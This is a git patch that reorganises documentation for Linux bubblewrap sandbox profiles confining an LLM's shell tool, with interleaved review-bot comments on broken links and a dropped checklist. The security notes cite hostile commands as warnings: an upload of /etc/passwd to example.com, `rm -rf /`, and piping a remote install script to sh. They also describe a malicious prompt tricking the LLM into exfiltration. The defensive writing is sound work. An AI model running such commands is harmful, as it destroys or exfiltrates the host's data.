From 0948b7548d2fa867ca5a8f6210d00e8ec0cc8d54 Mon Sep 17 00:00:00 2001
From: Sewer56
Date: Sat, 25 Apr 2026 15:07:07 +0100
Subject: [PATCH] Changed: Consolidate sandbox docs into wiki, remove root SANDBOX-PROFILES.md

- Move detailed mount tables, env vars, rationale, and AllowedPathResolver security note into new docs/src/extra-sandboxing-notes.md
- Trim sandboxing.md: replace duplicate under-the-hood section with links to extra-sandboxing-notes.md
- Delete root SANDBOX-PROFILES.md (single source of truth is now the wiki)
- Update all 7 stale SANDBOX-PROFILES.md references across READMEs, ARCHITECTURE.md, and Rust doc comments to point to published wiki URLs
- Add Extra Sandboxing Notes to mkdocs.yml nav under Extra section
---
 README.MD | 2 +-
 SANDBOX-PROFILES.md | 301 -------------------
 docs/mkdocs.yml | 2 +
 docs/src/extra-sandboxing-notes.md | 167 ++++++++++
 docs/src/sandboxing.md | 36 +--
 src/reloaded-code-bubblewrap/ARCHITECTURE.md | 2 +-
 src/reloaded-code-bubblewrap/README.md | 2 +-
 src/reloaded-code-core/README.md | 2 +-
 src/reloaded-code-core/src/path/allowed.rs | 2 +-
 src/reloaded-code-core/src/tools/bash/mod.rs | 2 +-
 src/reloaded-code-serdesai/README.md | 2 +-
 src/reloaded-code-serdesai/src/tools/bash.rs | 2 +-
 12 files changed, 189 insertions(+), 333 deletions(-)
 delete mode 100644 SANDBOX-PROFILES.md
 create mode 100644 docs/src/extra-sandboxing-notes.md

diff --git a/README.MD b/README.MD
index 199a558..198ea86 100644
--- a/README.MD
+++ b/README.MD
@@ -149,7 +149,7 @@ cargo run --example serdesai-task -p reloaded-code-serdesai
 - [reloaded-code-serdesai README](./src/reloaded-code-serdesai/README.md)
 - [reloaded-code-bubblewrap README](./src/reloaded-code-bubblewrap/README.md)
 - [reloaded-code-models-dev README](./src/reloaded-code-models-dev/README.md)
-- [Sandbox profiles and operator checklist](./SANDBOX-PROFILES.md)
+- [Sandbox profiles and operator checklist](https://reloaded-project.github.io/ReloadedCode/extra_sandboxing_notes/)
 - [API Reference (docs.rs)](https://docs.rs/reloaded-code-core)
 
 ## Contributing
diff --git a/SANDBOX-PROFILES.md b/SANDBOX-PROFILES.md
deleted file mode 100644
index 23ecca8..0000000
--- a/SANDBOX-PROFILES.md
+++ /dev/null
@@ -1,301 +0,0 @@ -# Linux Sandbox Profiles - -This guide covers the Bubblewrap-based Linux sandboxing provided by -`reloaded-code-bubblewrap` when the `linux-bubblewrap` feature is enabled. - -## Why Sandboxing Matters - -When an LLM runs shell commands, it can do anything the underlying process -is allowed to do: read secrets, delete files, make network requests to -exfiltrate data, and more. - -Sandboxing puts the shell inside an isolated filesystem so that only the -paths you explicitly allow are visible, and network access can be turned -off entirely. This is enforced by the kernel. - -This system is built on [bubblewrap][bwrap], a lightweight sandboxing tool -that uses Linux kernel namespaces. It is enabled via the `linux-bubblewrap` -Cargo feature flag and requires a Linux host with `bwrap` installed. - -**Important:** the sandbox never silently falls back to host execution. If -`bwrap` is missing or unusable, you get an explicit error instead. - -## The Two Profiles - -There are two preset profiles, each designed for a different trust level. - -### Public Bot - -Use this profile when the LLM is handling **untrusted or hostile input**, -for example a Discord bot or any scenario where you don't fully trust the -prompts being sent. - -Key characteristics: - -- **Network disabled.** No outbound connections at all. -- **Minimal filesystem.** Starts from an empty view of the filesystem. - Only selected system runtime roots, a writable workspace, and a synthetic - home are visible. -- **Synthetic home.** A dedicated directory replaces the real home, so - `~/.ssh` and other credential directories are never accessible. -- **Environment scrubbed.** All inherited variables are cleared and only - a sanitized system `PATH` and `HOME` are set. -- **Resolved host shell.** Commands run via a visible system `bash` or - fallback `sh`, not a home-directory or temp `PATH` entry. 
- -### Trusted Maintenance - -Use this profile for **trusted automation** like CI/CD pipelines, build -jobs, maintenance tasks, and similar workloads where you control the -inputs. - -Key characteristics: - -- **Network enabled.** -- **Full host `/` visible (read-only).** -- **Narrowed writable areas:** only the workspace, a synthetic home, a - cache root, and a configurable sandbox `/tmp` backing. -- **`/etc/shadow` hidden** by a memory overlay. -- **Credential mounts** via `with_credential_file_mounts`, with validation - that destinations stay within allowed directories. - -> **Security warning:** this profile is not safe for untrusted input. -> Network access remains available and the full host filesystem is -> readable. For example, a malicious prompt could trick the LLM into -> running `curl https://example.com --upload-file /etc/passwd` to -> exfiltrate host data, or use `ip addr` to reveal your network -> configuration. Use this profile only for trusted inputs. - -### Quick Comparison - -| Aspect | Public Bot | Trusted Maintenance | -| ---------------------- | ---------------------------------------------- | ----------------------------------------------------- | -| **Use case** | Untrusted / hostile input | Trusted automation (CI/CD, builds, etc.) 
| -| **Network** | Disabled (`--unshare-net`) | Enabled | -| **Host filesystem** | Minimal (bins, libs, workspace) | Full `/` read-only | -| **Writable paths** | Workspace, synthetic home, configurable `/tmp` | Workspace, synthetic home, cache, configurable `/tmp` | -| **Home directory** | Synthetic only | Synthetic + `/home` tmpfs overlay | -| **`/etc` visible** | No | Yes (except `/etc/shadow` tmpfs overlay) | -| **Environment** | Cleared, sanitized system `PATH` + `HOME` | Cleared, sanitized host `PATH` + XDG/build vars | -| **Credential mounts** | Not supported | Supported (validated destinations) | -| **Cache root** | Not mounted | Optional writable bind | -| **Shell** | Visible system `bash`/`sh` | Visible system `bash`/`sh` | -| **Safe for untrusted** | Yes | No | - -## How Sandboxing Works - -The sandbox starts from an **empty filesystem view**. Nothing from the host -is visible unless explicitly mounted in. This section explains the -mechanics. - -### Mount Types - -Bubblewrap provides several ways to bring paths into the sandbox: - -| Type | Flag | Effect | -| -------------- | ----------- | -------------------------------------------------------------- | -| Read-only bind | `--ro-bind` | Read-only access to a host path | -| Writable bind | `--bind` | Read-write access to a host path | -| Memory overlay | `--tmpfs` | Writable directory backed by memory; hides anything underneath | -| Symlink | `--symlink` | Creates a symlink inside the sandbox | - -### Environment Isolation - -The sandbox clears all inherited environment variables with `--clearenv`, -then rebuilds the environment using only explicitly allowed variables via -`--setenv`. This prevents secrets that might be in the parent process from -leaking into the sandbox. - -### Network Isolation - -The `--unshare-net` flag removes all network access inside the sandbox by -placing it in its own network namespace with no network interfaces. 
This -is used by the Public Bot profile and is a kernel-level isolation, not -just a firewall rule. - -### Process Lifecycle - -- `--die-with-parent`: the sandboxed process is killed if the parent - process exits -- `--new-session`: creates a new process session for clean signal handling -- Configurable timeouts with buffered output preservation on kill - -### LLM Awareness - -When the sandbox has network disabled, the system prompt tells the LLM that -network access is unavailable, so it can adjust its behavior accordingly. - -## Profile Details - -### Public Bot - -#### Mounts - -| Path | Type | Purpose | -| ----------------------------------------- | --------------------- | --------------------------------------------------------- | -| Selected system runtime roots (see below) | `--ro-bind` | Common system shells, binaries, and libraries (read-only) | -| `/dev` | `--dev` | Device files (minimal set) | -| `/proc` | `--proc` | Process filesystem | -| `/tmp` | `--tmpfs` or `--bind` | Temporary files; RAM-backed or caller-managed host dir | -| `/workspace` | `--bind` | Working directory (writable) | -| `/home/sandbox` | `--bind` | Synthetic home (writable) | -| `/bin`, `/lib`, `/sbin` (when needed) | `--symlink` | Compatibility links into mounted system roots | - -System runtime roots are selected from the following paths when present: - -- `/usr/bin`, `/usr/lib`, `/lib64` -- `/run/current-system/sw` ([NixOS]) -- `/nix/store`, `/nix/var/nix/profiles/default` ([Nix]) - -#### Environment - -| Variable | Value | -| -------- | ------------------------------------------------------------------------------------------------------------- | -| `PATH` | Sanitized system `PATH` derived from the host; excludes home, temp, wrapper, and per-user profile directories | -| `HOME` | `/home/sandbox` | - -#### Network - -Disabled (`--unshare-net`). - -#### Cache Root - -Not mounted. 
A cache root is an optional host directory for storing build -artifacts and other reusable data between sandbox runs. The Public Bot -profile intentionally leaves it out so nothing persists across sessions. - -#### Why These Mounts - -- **System runtime roots**: mounted read-only so the resolved host shell - plus common distro/[Nix] binaries remain available without exposing the - full host root. -- **`/dev`, `/proc`, sandbox `/tmp`**: provide the minimum runtime surface - for common tools. -- **Real home directory hidden**: prevents accidental secret disclosure - from `~/.ssh` and similar directories. -- **`/etc` omitted**: avoids host-configuration coupling and credential - exposure (no `/etc/passwd` visible). -- **Inherited env cleared**: prevents credential leakage through - environment variables. -- **User-specific and volatile roots hidden**: minimizes attack surface - and information disclosure while still allowing common system binaries. - -Note: Commands that rely on paths like `/etc/alternatives`, `/opt`, or -per-user profile bins may still need explicit extra mounts. 
- -### Trusted Maintenance - -#### Mounts - -| Path | Type | Purpose | -| ------------------------ | --------------------- | ----------------------------------------------------- | -| `/` | `--ro-bind` | Entire host `/` (read-only) | -| `/home` | `--tmpfs` | Writable overlay (shadows real home) | -| `/etc/shadow` | `--tmpfs` | Shadowed (prevents password hash exposure) | -| `/workspace` | `--bind` | Working directory (writable) | -| `/home/sandbox` | `--bind` | Synthetic home (writable) | -| `/cache` (if configured) | `--bind` | Cache root (writable) | -| `/dev` | `--dev` | Device files | -| `/proc` | `--proc` | Process filesystem | -| `/tmp` | `--tmpfs` or `--bind` | Temporary files on RAM or caller-managed host storage | - -#### Environment - -| Variable | Value | -| ----------------- | ---------------------------------------------------------- | -| `PATH` | Sanitized host `PATH` with hidden/volatile entries removed | -| `HOME` | `/home/sandbox` | -| `TMPDIR` | `/tmp` (matches the configured sandbox tmp backing) | -| `XDG_CACHE_HOME` | `{cache_root}/xdg-cache` | -| `XDG_CONFIG_HOME` | `/home/sandbox/.config` | -| `XDG_STATE_HOME` | `{cache_root}/xdg-state` | - -#### Network - -Enabled by default. - -#### Why These Mounts - -- **Read-only host `/`**: keeps existing toolchains usable without - rebinding every distro-specific path. -- **Writable state narrowed**: synthetic home, workspace, cache root, and - memory overlays provide necessary write locations without exposing - arbitrary host paths. -- **`/etc/shadow` shadowed**: password hashes are not exposed even though - the rest of `/etc` remains visible for compatibility. -- **XDG directories set**: build tools use cache and state directories - without polluting the synthetic home. - -## Security Notes - -### AllowedPathResolver Is Not a Shell Sandbox - -[`AllowedPathResolver`][apr] only constrains structured file tools -(`read`, `write`, `edit`, `glob`, `grep`). It does **not** make shell -execution safe. 
- -When the `bash` tool is enabled: - -- An LLM can run arbitrary shell commands -- Commands can read, write, or delete any file the process has OS-level - permissions for -- Examples: `cat /etc/passwd`, `rm -rf /`, - `curl https://example.invalid/install.sh | sh` - -If your threat model includes shell execution, use the Linux `bwrap` -sandbox profiles documented here, or disable shell execution entirely. - -### Anti-Patterns to Avoid - -These patterns weaken sandbox isolation: - -- **Real home bind**: mounting the actual home directory exposes SSH keys - and other secrets -- **Full credential-store mounts**: mounting `~/.ssh`, - `~/.config/gcloud`, etc. defeats isolation -- **SSH agent forwarding**: socket forwarding bypasses filesystem - restrictions entirely -- **Broad writable host roots**: writable binds to `/opt`, `/var`, etc. - increase blast radius -- **Unnecessary env passthrough**: inheriting secrets via environment - variables can leak them even with `--clearenv` - -### Best Practices - -For reproducibility and isolation: - -1. **Use a synthetic home** (e.g., `/tmp/sandbox-home-{job-id}`) rather - than the real home directory -2. **Mount cache roots explicitly** for build artifacts that should persist - between runs -3. **Set `XDG_CACHE_HOME` and `XDG_STATE_HOME`** to cache-appropriate - locations inside the sandbox - -## Pre-Deployment Checklist - -Before going into production, verify the following on your target host. -The library handles things like synthetic home setup, environment -scrubbing, and visible system-shell resolution for you. These checks cover what -depends on your environment. 
- -### Host - -- [ ] `bwrap` is installed and on `PATH` -- [ ] Kernel user namespaces are available (check - `sysctl kernel.unprivileged_userns_clone` if applicable) - -### Public Bot - -- [ ] No outbound network connections are possible -- [ ] No host credentials are accessible inside the sandbox -- [ ] Writes outside the workspace go to tmpfs, not the host - -### Trusted Maintenance - -- [ ] Cache and build output directories work correctly on your host -- [ ] No unintended host paths are writable from inside the sandbox - -[bwrap]: https://github.com/containers/bubblewrap -[apr]: https://docs.rs/reloaded-code-core/latest/reloaded_code_core/struct.AllowedPathResolver.html -[NixOS]: https://nixos.org -[Nix]: https://nixos.org diff --git a/docs/mkdocs.yml b/docs/mkdocs.yml index 4597699..8e07e10 100755 --- a/docs/mkdocs.yml +++ b/docs/mkdocs.yml @@ -78,3 +78,5 @@ nav: - Comparison: comparison.md - Migration: migration.md - Custom Framework Integration: guides/custom-framework.md + - Extra: + - Extra Sandboxing Notes: extra-sandboxing-notes.md diff --git a/docs/src/extra-sandboxing-notes.md b/docs/src/extra-sandboxing-notes.md new file mode 100644 index 0000000..37e02c5 --- /dev/null +++ b/docs/src/extra-sandboxing-notes.md 
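Review bot: The nav entry registers `extra-sandboxing-notes.md`, and mkdocs derives the page URL from that file name, so the published path should be `.../extra-sandboxing-notes/`, yet the README.MD and src/reloaded-code-bubblewrap/README.md hunks in this commit link to `.../extra_sandboxing_notes/` (underscores) while the ARCHITECTURE.md hunk uses the hyphenated form, and at most one of the two can resolve. Unless the site config rewrites slugs (nothing in this hunk suggests it does), the two underscore links should read `[Sandbox profiles and operator checklist](https://reloaded-project.github.io/ReloadedCode/extra-sandboxing-notes/)` and `[Extra Sandboxing Notes](https://reloaded-project.github.io/ReloadedCode/extra-sandboxing-notes/)`. A link check over the rendered docs in CI would catch this class of drift before the stale references the commit set out to fix are replaced by broken ones.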
@@ -0,0 +1,167 @@ +# Extra Sandboxing Notes + +Detailed mount tables, environment variables, and design rationale for the two +built-in sandbox profiles. For profile descriptions, comparison, and setup +instructions, see [Sandboxing](sandboxing.md). + +## Profile details + +### Public Bot + +#### Mounts + +| Path | Type | Purpose | +| ----------------------------------------- | --------------------- | --------------------------------------------------------- | +| Selected system runtime roots (see below) | `--ro-bind` | Common system shells, binaries, and libraries (read-only) | +| `/dev` | `--dev` | Device files (minimal set) | +| `/proc` | `--proc` | Process filesystem | +| `/tmp` | `--tmpfs` or `--bind` | Temporary files; RAM-backed or caller-managed host dir | +| `/workspace` | `--bind` | Working directory (writable) | +| `/home/sandbox` | `--bind` | Synthetic home (writable) | +| `/bin`, `/lib`, `/sbin` (when needed) | `--symlink` | Compatibility links into mounted system roots | + +System runtime roots are selected from the following paths when present: + +- `/usr/bin`, `/usr/lib`, `/lib64` +- `/run/current-system/sw` ([NixOS]) +- `/nix/store`, `/nix/var/nix/profiles/default` ([Nix]) + +#### Environment + +| Variable | Value | +| -------- | ------------------------------------------------------------------------------------------------------------- | +| `PATH` | Sanitized system `PATH` derived from the host; excludes home, temp, wrapper, and per-user profile directories | +| `HOME` | `/home/sandbox` | + +#### Network + +Disabled (`--unshare-net`). + +#### Cache root + +Not mounted. A cache root is an optional host directory for storing build +artifacts and other reusable data between sandbox runs. The Public Bot profile +intentionally leaves it out so nothing persists across sessions. 
+ +#### Why these mounts + +- **System runtime roots**: mounted read-only so the resolved host shell plus + common distro/[Nix] binaries remain available without exposing the full host + root. +- **`/dev`, `/proc`, sandbox `/tmp`**: provide the minimum runtime surface for + common tools. +- **Real home directory hidden**: prevents accidental secret disclosure from + `~/.ssh` and similar directories. +- **`/etc` omitted**: avoids host-configuration coupling and credential + exposure (no `/etc/passwd` visible). +- **Inherited env cleared**: prevents credential leakage through environment + variables. +- **User-specific and volatile roots hidden**: minimizes attack surface and + information disclosure while still allowing common system binaries. + +!!! note "Commands that need extra mounts" + + Commands that rely on paths like `/etc/alternatives`, `/opt`, or per-user + profile bins may still need explicit extra mounts. + +### Trusted Maintenance + +#### Mounts + +| Path | Type | Purpose | +| ------------------------ | --------------------- | ----------------------------------------------------- | +| `/` | `--ro-bind` | Entire host `/` (read-only) | +| `/home` | `--tmpfs` | Writable overlay (shadows real home) | +| `/etc/shadow` | `--tmpfs` | Shadowed (prevents password hash exposure) | +| `/workspace` | `--bind` | Working directory (writable) | +| `/home/sandbox` | `--bind` | Synthetic home (writable) | +| `/cache` (if configured) | `--bind` | Cache root (writable) | +| `/dev` | `--dev` | Device files | +| `/proc` | `--proc` | Process filesystem | +| `/tmp` | `--tmpfs` or `--bind` | Temporary files on RAM or caller-managed host storage | + +#### Environment + +| Variable | Value | +| ----------------- | ---------------------------------------------------------- | +| `PATH` | Sanitized host `PATH` with hidden/volatile entries removed | +| `HOME` | `/home/sandbox` | +| `TMPDIR` | `/tmp` (matches the configured sandbox tmp backing) | +| `XDG_CACHE_HOME` | 
`{cache_root}/xdg-cache` | +| `XDG_CONFIG_HOME` | `/home/sandbox/.config` | +| `XDG_STATE_HOME` | `{cache_root}/xdg-state` | + +#### Network + +Enabled by default. + +#### Why these mounts + +- **Read-only host `/`**: keeps existing toolchains usable without rebinding + every distro-specific path. +- **Writable state narrowed**: synthetic home, workspace, cache root, and + memory overlays provide necessary write locations without exposing arbitrary + host paths. +- **`/etc/shadow` shadowed**: password hashes are not exposed even though the + rest of `/etc` remains visible for compatibility. +- **XDG directories set**: build tools use cache and state directories without + polluting the synthetic home. + +## Under the hood + +### Mount types + +| Type | Flag | Effect | +| -------------- | ----------- | -------------------------------------------------------------- | +| Read-only bind | `--ro-bind` | Read-only access to a host path | +| Writable bind | `--bind` | Read-write access to a host path | +| Memory overlay | `--tmpfs` | Writable directory backed by memory; hides anything underneath | +| Symlink | `--symlink` | Creates a symlink inside the sandbox | + +### Environment isolation + +The sandbox clears all inherited environment variables with `--clearenv`, +then rebuilds the environment using only explicitly allowed variables via +`--setenv`. This prevents secrets that might be in the parent process from +leaking into the sandbox. + +### Network isolation + +The `--unshare-net` flag removes all network access inside the sandbox by +placing it in its own network namespace with no network interfaces. This is +a kernel-level isolation, not just a firewall rule. 
+ +### Process lifecycle + +- `--die-with-parent`: the sandboxed process is killed if the parent process + exits +- `--new-session`: creates a new process session for clean signal handling +- Configurable timeouts with buffered output preservation on kill + +### LLM awareness + +When the sandbox has network disabled, the system prompt tells the LLM that +network access is unavailable, so it can adjust its behavior accordingly. + +## Security notes + +### AllowedPathResolver is not a shell sandbox + +[`AllowedPathResolver`][apr] only constrains structured file tools +(`read`, `write`, `edit`, `glob`, `grep`). It does **not** make shell +execution safe. + +When the `bash` tool is enabled: + +- An LLM can run arbitrary shell commands +- Commands can read, write, or delete any file the process has OS-level + permissions for +- Examples: `cat /etc/passwd`, `rm -rf /`, + `curl https://example.invalid/install.sh | sh` + +If your threat model includes shell execution, use the Linux `bwrap` +sandbox profiles documented here, or disable shell execution entirely. + +[apr]: https://docs.rs/reloaded-code-core/latest/reloaded_code_core/struct.AllowedPathResolver.html +[NixOS]: https://nixos.org +[Nix]: https://nixos.org diff --git a/docs/src/sandboxing.md b/docs/src/sandboxing.md index fcae157..6927736 100644 --- a/docs/src/sandboxing.md +++ b/docs/src/sandboxing.md @@ -229,6 +229,9 @@ network exfiltration, credential theft, and host filesystem writes. - Commands run via the system `bash` or `sh` (resolved from mounted system paths) +See [Profile Reference](extra-sandboxing-notes.md#public-bot) for the full +mount table, environment variables, and design rationale. + #### Trusted Maintenance For **trusted automation** - CI/CD pipelines, build jobs, maintenance tasks 
@@ -248,6 +251,9 @@ contained to limit blast radius from accidental damage. - Selective bind-mounts of credential directories (e.g. `~/.ssh`, `~/.config/gcloud`) into the sandbox, with validated mount destinations +See [Profile Reference](extra-sandboxing-notes.md#trusted-maintenance) for the +full mount table, environment variables, and design rationale. + !!! danger "Trusted Maintenance is not safe for untrusted input" Network access remains available and the full host filesystem is readable. 
@@ -267,32 +273,14 @@ contained to limit blast radius from accidental damage. | Credential mounts | Not supported | Supported (validated) | | Safe for untrusted | **Yes** | **No** | -### Under the hood: mounts, environment, and network - -The sandbox starts from an empty filesystem view. The sandbox exposes nothing -from the host unless you mount it. - -**Mount types:** - -| Type | Flag | Effect | -| -------------- | ----------- | -------------------------------------------------------------- | -| Read-only bind | `--ro-bind` | Read-only access to a host path | -| Writable bind | `--bind` | Read-write access to a host path | -| Memory overlay | `--tmpfs` | Writable directory backed by memory; hides anything underneath | -| Symlink | `--symlink` | Creates a symlink inside the sandbox | - -**Environment isolation:** The sandbox clears all inherited variables -(`--clearenv`), then sets only explicitly allowed ones (`--setenv`). - -**Network isolation:** `--unshare-net` places the sandbox in its own network -namespace with no interfaces. This is kernel-level, not a firewall rule. +### Under the hood -**Process lifecycle:** `--die-with-parent` kills the sandboxed process if the -parent exits. `--new-session` creates a clean process session for signal -handling. +The sandbox starts from an empty filesystem view. Nothing from the host is +visible unless explicitly mounted in. The kernel enforces filesystem, network, +and process isolation — this is not a userspace restriction. -**LLM awareness:** When the sandbox disables network access, the system prompt -tells the LLM that network is unavailable, so it adjusts its behaviour. +For the full mount-type reference, per-profile mount and environment tables, +and design rationale, see [Profile Reference](extra-sandboxing-notes.md). ## Security best practices diff --git a/src/reloaded-code-bubblewrap/ARCHITECTURE.md b/src/reloaded-code-bubblewrap/ARCHITECTURE.md index 622a193..d54ac72 100644 
--- a/src/reloaded-code-bubblewrap/ARCHITECTURE.md +++ b/src/reloaded-code-bubblewrap/ARCHITECTURE.md @@ -3,7 +3,7 @@ Linux-only library that builds [bubblewrap] sandbox profiles, probes host capabilities, and produces wrapped command lines. -For the security model, see [SANDBOX-PROFILES.md](../../SANDBOX-PROFILES.md). +For the security model, see [Extra Sandboxing Notes](https://reloaded-project.github.io/ReloadedCode/extra-sandboxing-notes/). ## File Map diff --git a/src/reloaded-code-bubblewrap/README.md b/src/reloaded-code-bubblewrap/README.md index 0a2ea60..e92b08f 100644 --- a/src/reloaded-code-bubblewrap/README.md +++ b/src/reloaded-code-bubblewrap/README.md @@ -140,7 +140,7 @@ per-user profile directories from the inherited `PATH`. still drops entries under directories hidden by the profile. For more details on sandbox profiles and trade-offs, see -[SANDBOX-PROFILES.md](https://github.com/Reloaded-Project/ReloadedCode/blob/main/SANDBOX-PROFILES.md). +[Extra Sandboxing Notes](https://reloaded-project.github.io/ReloadedCode/extra_sandboxing_notes/). ## Builder Lists diff --git a/src/reloaded-code-core/README.md b/src/reloaded-code-core/README.md index 030c977..54b33b6 100644 --- a/src/reloaded-code-core/README.md +++ b/src/reloaded-code-core/README.md @@ -137,7 +137,7 @@ Two profiles are available: We default to the **Public Bot** profile when sandboxing is enabled. In either case, evaluate whether the chosen profile fits your security needs. -See [SANDBOX-PROFILES.md](https://github.com/Reloaded-Project/ReloadedCode/blob/main/SANDBOX-PROFILES.md) for the full operator +See [Sandboxing docs](https://reloaded-project.github.io/ReloadedCode/sandboxing/) for the full operator guide and checklist. ### Context and wrapper mapping diff --git a/src/reloaded-code-core/src/path/allowed.rs b/src/reloaded-code-core/src/path/allowed.rs index 23b7487..4e5a942 100644 --- a/src/reloaded-code-core/src/path/allowed.rs +++ b/src/reloaded-code-core/src/path/allowed.rs 
@@ -55,7 +55,7 @@ use std::sync::Arc; /// /// This resolver only restricts the structured file operations (`read`, `write`, `edit`, /// `glob`, `grep`). It does not make shell execution safe. -/// See `SANDBOX-PROFILES.md` for details on sandboxing on Linux. +/// See the [Sandboxing docs](https://reloaded-project.github.io/ReloadedCode/sandboxing/) for details on sandboxing on Linux. #[derive(Debug, Clone)] pub struct AllowedPathResolver { /// Canonicalized allowed base directories. diff --git a/src/reloaded-code-core/src/tools/bash/mod.rs b/src/reloaded-code-core/src/tools/bash/mod.rs index 211283d..db9f8e3 100644 --- a/src/reloaded-code-core/src/tools/bash/mod.rs +++ b/src/reloaded-code-core/src/tools/bash/mod.rs @@ -23,7 +23,7 @@ doc = "- `Builder::trusted_maintenance` for trusted jobs (network enabled, read-only host rootfs)." )] //! -//! See +//! See //! for the full operator guide. //! //! # Errors diff --git a/src/reloaded-code-serdesai/README.md b/src/reloaded-code-serdesai/README.md index 3ee9e49..a5b6862 100644 --- a/src/reloaded-code-serdesai/README.md +++ b/src/reloaded-code-serdesai/README.md @@ -186,7 +186,7 @@ We default to **Public Bot** profile when sandboxing is used. In either case, trusted or not, please evaluate whether the solution fits your security needs. I can make no guarantees. -More info in [SANDBOX-PROFILES.md](https://github.com/Reloaded-Project/ReloadedCode/blob/main/SANDBOX-PROFILES.md). +More info in [Sandboxing docs](https://reloaded-project.github.io/ReloadedCode/sandboxing/). ## Examples diff --git a/src/reloaded-code-serdesai/src/tools/bash.rs b/src/reloaded-code-serdesai/src/tools/bash.rs index 96d45d4..8a352cb 100644 --- a/src/reloaded-code-serdesai/src/tools/bash.rs +++ b/src/reloaded-code-serdesai/src/tools/bash.rs @@ -20,7 +20,7 @@ looser sandbox for build automation. Not safe against hostile commands.\n\ \n\ See the workspace guide at \ - \ + \ for full profile configuration and setup instructions." )]
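Review bot: The new `/// See the [Sandboxing docs](...)` line on `AllowedPathResolver` points at the general sandboxing overview, but this commit moves the "AllowedPathResolver is not a shell sandbox" note specifically into docs/src/extra-sandboxing-notes.md, so the rustdoc should link that section rather than the overview, keeping the two statements of the limitation in sync. The added line is also well over 100 columns and rustfmt will not rewrap comments, so splitting it keeps the source readable: `/// See the [Sandboxing docs](https://reloaded-project.github.io/ReloadedCode/extra-sandboxing-notes/#allowedpathresolver-is-not-a-shell-sandbox)` followed by `/// for details on sandboxing on Linux.` The anchor slug is inferred from the heading text and should be checked against the built site. The struct definition continues outside the hunk.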
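Review bot: The `//! See ... for the full operator guide.` module doc still promises an operator guide, but the "Anti-Patterns to Avoid", "Best Practices" and "Pre-Deployment Checklist" sections of the deleted SANDBOX-PROFILES.md are not recreated in the new docs/src/extra-sandboxing-notes.md anywhere in this diff, and the checklist items (bwrap on PATH, user namespaces available, no outbound network, no host credentials reachable, writes outside the workspace land on tmpfs) are the part an operator most needs before enabling this tool. Unless docs/src/sandboxing.md already carries them (only its "Security best practices" heading is visible as context here), they should be restored under extra-sandboxing-notes.md. The same gap affects the "operator checklist" link text in README.MD and the "full operator guide and checklist" wording in src/reloaded-code-core/README.md. The link target itself is not visible in this rendering of the hunk, so I could not verify which page it now points to; the module docs continue outside the hunk.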